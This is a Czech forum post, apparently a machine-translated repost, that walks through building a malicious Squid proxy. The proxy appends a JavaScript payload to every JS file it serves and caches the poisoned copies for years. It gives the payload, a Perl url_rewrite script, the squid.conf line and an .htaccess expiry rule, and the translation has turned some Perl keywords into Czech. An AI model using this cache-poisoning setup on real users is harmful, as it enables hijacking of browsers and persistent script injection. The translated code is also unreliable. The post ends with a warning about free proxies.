Tento příspěvek byl naposledy upraven Mo Xiaowenem dne 7. 6. 2015 v 23:19
To lze provést jednoduše úpravou konfigurace SQUID
Co je SQUID?
Squid je software, který ukládá internetová data, přijímá požadavky na stažení od uživatelů a automaticky zpracovává stažená data. Když chce uživatel stáhnout domovskou stránku, může poslat žádost Squidovi, požádat ho, aby ji stáhl jeho jménem, pak se Squid připojí na web, požádá o domovskou stránku a následně pošle domovskou stránku uživateli a zároveň si ji zálohuje; když se o stejnou stránku přihlásí i další uživatelé, Squid okamžitě pošle uloženou zálohu uživateli, takže uživatel má pocit, že rychlost je poměrně vysoká. Squid může proxy používat protokoly jako HTTP, FTP, GOPHER, SSL a WAIS, a Squid to zvládá automaticky, a vy si můžete nastavit Squid podle svých potřeb, abyste filtrovali nežádoucí věci.
Squid může fungovat v mnoha operačních systémech, jako jsou AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 atd.
Implementace je velmi jednoduchá:
1. Nainstalovat Squid na jeden linuxový server.
2. Upravit kód serveru, vložit část našeho kódu do všech přenesených javascripů a odesílat ji.
3. Nastavte čas cache našeho upraveného js souboru co nejvyšší.
Tato metoda platí také pro weby s povoleným SSL – pokud web načte nezabezpečený zdroj (například jquery pro HTTP web), většina prohlížečů dá varování, ale málokdo tomu věnuje pozornost.
Chema uvedl, že jeho proxy používalo několik dní po zveřejnění více než 5 000 lidí a většina lidí ho použila k špatným věcem, protože použili proxy, takže si mysleli, že je anonymní a bezpečný, ale nikdy nečekali, že proxy server udělá také špatné věci.
Vytvořte si škodlivý proxy server
Pokud už máte proxy server Squid, budete také potřebovat webový server, například Apache.
Krok 1: Vytvořit užitečné zatížení
Používám jednoduchý skript jako ukázku, abych nasměroval všechny hypertextové odkazy na svůj web.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++) document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Krok 2: Napište skript, který infikuje všechny JS soubory
/etc/squid/poison.pl [mw_shl_code=perl, pravda] #!/usr/bin/perl $|=1; $count = 0; $pid = $$; zatímco (<>)
{ chousnout $_; if($_ =- /(.*.js)/i) { $url = $; system ("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url"); system("chmod o+r /var/www/tmp/$pid-$count.js"); systém ("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js"); tisk "http://127.0.0.1:80/tmp/$pid-$count.js"; } jinak { tisk "$_"; } $count++; }[/mw_shl_code]
Tento skript používá wget k získání původního javascripu stránky a odstranění t souboru, pak přidá kód do /etc/squid/payload.js a pošle upravený soubor klientovi, zatímco vy musíte vytvořit adresář /var/www/tmp a umožnit squidu do něj zapisovat soubory. Tento adresář ukládá upravené js soubory.
Krok 3: Kombinujte výše uvedený skript se Squid
Přidejte to do /etc/squid/squid.conf [mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Krok 4: Udělejte, aby cache nikdy nezklamala
/var/www/tmp/.htaccess [mw_shl_code=html,true] ExpiresActive On ExpiresDefault "přístup plus 3000 dní"[/mw_shl_code]
To Apachovi řekne, aby mu dal dlouhou dobu expirace, dokud uživatel nevyčistí svou cache.
Pokud tento proxy připojíte, kliknutím na jakýkoli hypertextový odkaz vás přesměruje na můj web a cache bude existovat i v případě, že proxy později nepoužijete. Použil jsem neagresivní payload, a s touto metodou mohou hackeři udělat mnohem víc. Takže si připomeňte, abyste byli opatrní při používání bezplatných proxy.
|